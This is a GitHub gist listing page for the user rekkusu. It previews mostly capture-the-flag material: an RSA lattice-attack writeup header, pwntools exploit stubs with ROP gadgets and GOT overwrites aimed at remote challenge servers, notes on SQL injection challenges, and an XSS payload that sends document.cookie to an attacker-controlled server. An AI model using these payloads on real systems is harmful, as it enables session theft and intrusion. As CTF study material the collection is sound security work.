I hereby claim:
- I am rekkusu on github.
- I am xrekkusu (https://keybase.io/xrekkusu) on keybase.
- I have a public key ASDikKa6pgDX2d4GPEgqRbS4aQZnkti0ROig4psGPje8bAo
To claim this, I am signing this object:
Rex rekkusu
rekkusu
/ sharsable.sage
Last active
October 19, 2020 06:51
SECCON 2020 Online CTF sharsable author writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Overview | |
| # This challenge is based on May's version of Wiener's Attack | |
| # (https://www.math.uni-frankfurt.de/~dmst/teaching/WS2015/Vorlesung/Alex.May.pdf) | |
| # But the attack can't be apply to the challenge because it has 2 exponents, | |
| # so you have to extend the method of May. | |
| # After LLL, choose 2 shortest vectors and reconstruct polynomial. | |
| # then pick coefficients and decrypt ciphertext | |
| import json | |
| from binascii import unhexlify |
rekkusu
/ keybase.md
Created
December 6, 2019 18:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| fetch('/nonce').then(r => r.text()).then(nonce => { | |
| document.write('<iframe src="http://35.187.214.138:10023/?q=<script nonce='+nonce+'>location.href=\'//[server]/flag?f=\'%2Bdocument.cookie\x3c\x2fscript>"></iframe>'); | |
| }); | |
| </script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'mkmf' | |
| create_makefile('shellcode') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| ret_addr = 0x8056afa | |
| pop2ret = 0x80578fa | |
| leaveret = 0x804889f | |
| password = 0x805f0c0 | |
| sock_send = 0x804884b | |
| s = remote('54.152.37.20', 24242) | |
| payload = [ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import string | |
| strcmp_got = 0x603050 | |
| free_libc = 0x222c40 | |
| free_got = 0x603018 | |
| strchr_libc = 0x86d40 | |
| strchr_got = 0x603038 | |
| #system_libc = 0x46590 | |
| system_libc = 0xe5765 # One gadget RCE |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # local libc | |
| libc_data = 0x1bb000 | |
| libc_main_arena = libc_data + 0x203760 | |
| libc_environ = libc_data + 0x2064a0 | |
| libc_gadget = { | |
| 'poprdi': 0x22b1a, | |
| 'poprsi': 0x24805, | |
| 'poprdx': 0x1b8e, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [intercollege] | |
| 1. WebServiceX | |
| 記事投稿掲示板 | |
| SQLi | |
| パス丸見え | |
| 削除キーを抜き取り記事を削除する | |
| 2. SECCON競馬 | |
| node.jsで稼働するサーバ | |
| 各所にあるSQLiを攻撃 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| augroup fileread | |
| autocmd! | |
| autocmd BufNewFile,BufRead *.rb set shiftwidth=2 tabstop=2 expandtab | |
| " ... | |
| augroup END |
rekkusu
/ load.js
Created
August 17, 2011 15:50
— forked from KOBA789/load.js
こばのなにかひどいなにかを動作確認しないで書き換えてみた
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var load = new (function () { | |
| var count = 0; | |
| var next = function () {} | |
| var callback = function () { | |
| count --; | |
| if (count <= 0) { | |
| next(); | |
| } | |
| } | |
| self = this; |
NewerOlder